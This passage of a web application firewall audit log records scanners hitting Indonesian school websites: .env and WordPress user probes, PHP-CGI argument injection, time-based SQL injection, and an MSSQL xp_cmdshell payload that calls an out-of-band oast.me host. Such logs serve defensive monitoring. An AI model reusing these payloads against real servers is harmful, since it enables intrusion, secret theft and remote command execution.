78.153.140.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.177 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/SYB-1103211396; U; es-LA) Presto/2.7.81 Version/11.00 --28f1da75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28f1da75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749141680253917 659 (- - -) Stopwatch2: 1749141680253917 659; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28f1da75-Z-- --7e9cca06-A-- [05/Jun/2025:23:41:20 +0700] aEHIsH-K7ToMdu-YSIJc-QAAABg 103.236.140.4 44680 103.236.140.4 8181 --7e9cca06-B-- GET /backend/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.177 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.39 --7e9cca06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e9cca06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749141680687879 637 (- - -) Stopwatch2: 1749141680687879 637; combined=264, p1=219, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e9cca06-Z-- --1e7f1a4b-A-- [05/Jun/2025:23:51:59 +0700] aEHLL3-K7ToMdu-YSIJdAAAAABY 103.236.140.4 44712 103.236.140.4 8181 --1e7f1a4b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.175.77.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.175.77.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e7f1a4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e7f1a4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749142319201898 2650 (- - -) Stopwatch2: 1749142319201898 2650; combined=1231, p1=431, p2=770, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e7f1a4b-Z-- --ae7b9c2c-A-- [06/Jun/2025:00:16:14 +0700] aEHQ3irHpfaS2Cuwh8UObgAAAFU 103.236.140.4 44924 103.236.140.4 8181 --ae7b9c2c-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 (Edition Campaign 34) Accept-Charset: utf-8 Cookie: X-Forwarded-For: 45.148.10.172 Accept-Encoding: gzip X-Varnish: 173411878 --ae7b9c2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae7b9c2c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749143774835566 841 (- - -) Stopwatch2: 1749143774835566 841; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae7b9c2c-Z-- --3b5da274-A-- [06/Jun/2025:00:17:12 +0700] aEHRGOth7G2xELALzPZiwwAAAMY 103.236.140.4 44928 103.236.140.4 8181 --3b5da274-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.176.118.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.176.118.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3b5da274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b5da274-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749143832375225 2827 (- - -) Stopwatch2: 1749143832375225 2827; combined=1269, p1=412, p2=827, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b5da274-Z-- --59f19c2e-A-- [06/Jun/2025:00:18:13 +0700] aEHRVeth7G2xELALzPZixQAAANI 103.236.140.4 44938 103.236.140.4 8181 --59f19c2e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.73 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --59f19c2e-C-- --59f19c2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f19c2e-E-- --59f19c2e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749143893479599 5076 (- - -) Stopwatch2: 1749143893479599 5076; combined=3237, p1=532, p2=2670, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f19c2e-Z-- --66a43c51-A-- [06/Jun/2025:00:45:07 +0700] aEHXo-th7G2xELALzPZjAgAAAMI 103.236.140.4 45112 103.236.140.4 8181 --66a43c51-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173411917 --66a43c51-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --66a43c51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66a43c51-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749145507069173 2657 (- - -) Stopwatch2: 1749145507069173 2657; combined=1451, p1=386, p2=1037, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66a43c51-Z-- --87460376-A-- [06/Jun/2025:00:45:08 +0700] aEHXpFwdJdhOudw5hdwEIQAAAJU 103.236.140.4 45116 103.236.140.4 8181 --87460376-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 773 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235317 --87460376-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0us2vpgpeonc6qdbef06ehtpn3w5xiiy.oast.me'-- --87460376-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --87460376-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749145508033339 3672 (- - -) Stopwatch2: 1749145508033339 3672; combined=2307, p1=476, p2=1760, p3=21, p4=23, p5=26, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87460376-Z-- --9efbdf0b-A-- [06/Jun/2025:00:59:00 +0700] aEHa5Oth7G2xELALzPZjEAAAAMI 103.236.140.4 45640 103.236.140.4 8181 --9efbdf0b-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.11.198.108 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: python-requests/2.32.3 Accept: */* Server: nginx/1.26.1 Date: Thu, 05 Jun 2025 17:58:58 GMT Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: SenayanMember=8virv3q8mc9t9cr4djufeusep2; expires=Fri, 06-Jun-2025 05:58:58 GMT; Max-Age=43200; path=/; HttpOnly X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block, 1; mode=block X-Varnish: 173411970, 173235381 Age: 0 Via: 1.1 varnish (Varnish/5.2) X-Cache: HIT from Backend X-Content-Type-Options: nosniff Content-Encoding: gzip Cookie: X-Forwarded-For: 194.11.198.108 Accept-Encoding: gzip --9efbdf0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9efbdf0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749146340527496 944 (- - -) Stopwatch2: 1749146340527496 944; combined=321, p1=289, p2=0, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9efbdf0b-Z-- --eb9f1b0c-A-- [06/Jun/2025:01:14:41 +0700] aEHeketh7G2xELALzPZjJAAAAM4 103.236.140.4 45952 103.236.140.4 8181 --eb9f1b0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --eb9f1b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb9f1b0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749147281321942 807 (- - -) Stopwatch2: 1749147281321942 807; combined=327, p1=294, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb9f1b0c-Z-- --922d4916-A-- [06/Jun/2025:01:14:42 +0700] aEHekuth7G2xELALzPZjJQAAANI 103.236.140.4 45956 103.236.140.4 8181 --922d4916-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --922d4916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --922d4916-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749147282668021 636 (- - -) Stopwatch2: 1749147282668021 636; combined=253, p1=218, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --922d4916-Z-- --7ca71572-A-- [06/Jun/2025:01:31:20 +0700] aEHieH-K7ToMdu-YSIJdKQAAABI 103.236.140.4 46046 103.236.140.4 8181 --7ca71572-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 130.180.196.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 130.180.196.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7ca71572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca71572-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749148280386974 2851 (- - -) Stopwatch2: 1749148280386974 2851; combined=1254, p1=443, p2=781, p3=0, p4=0, p5=30, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca71572-Z-- --8cd7a42b-A-- [06/Jun/2025:02:00:39 +0700] aEHpVyrHpfaS2Cuwh8UOhgAAAEU 103.236.140.4 46190 103.236.140.4 8181 --8cd7a42b-B-- GET //.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 196.251.85.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 196.251.85.234 Accept-Encoding: gzip X-Varnish: 173235477 --8cd7a42b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8cd7a42b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749150039578623 874 (- - -) Stopwatch2: 1749150039578623 874; combined=315, p1=281, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd7a42b-Z-- --4432b055-A-- [06/Jun/2025:02:03:29 +0700] aEHqAX-K7ToMdu-YSIJdLwAAAAw 103.236.140.4 46208 103.236.140.4 8181 --4432b055-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 Accept-Charset: utf-8 --4432b055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4432b055-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749150209527997 809 (- - -) Stopwatch2: 1749150209527997 809; combined=332, p1=292, p2=0, p3=0, p4=0, p5=40, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4432b055-Z-- --fba53356-A-- [06/Jun/2025:02:04:19 +0700] aEHqM3-K7ToMdu-YSIJdMAAAAAM 103.236.140.4 46210 103.236.140.4 8181 --fba53356-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --fba53356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fba53356-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749150259597613 884 (- - -) Stopwatch2: 1749150259597613 884; combined=324, p1=274, p2=0, p3=0, p4=0, p5=50, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fba53356-Z-- --710b7858-A-- [06/Jun/2025:02:58:32 +0700] aEH26FwdJdhOudw5hdwEaAAAAJQ 103.236.140.4 46486 103.236.140.4 8181 --710b7858-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 81.168.83.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 81.168.83.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --710b7858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --710b7858-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749153512427456 3377 (- - -) Stopwatch2: 1749153512427456 3377; combined=1490, p1=491, p2=966, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --710b7858-Z-- --28a75554-A-- [06/Jun/2025:03:27:24 +0700] aEH9rOth7G2xELALzPZjdAAAANY 103.236.140.4 46698 103.236.140.4 8181 --28a75554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --28a75554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28a75554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749155244412670 804 (- - -) Stopwatch2: 1749155244412670 804; combined=314, p1=274, p2=0, p3=0, p4=0, p5=39, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
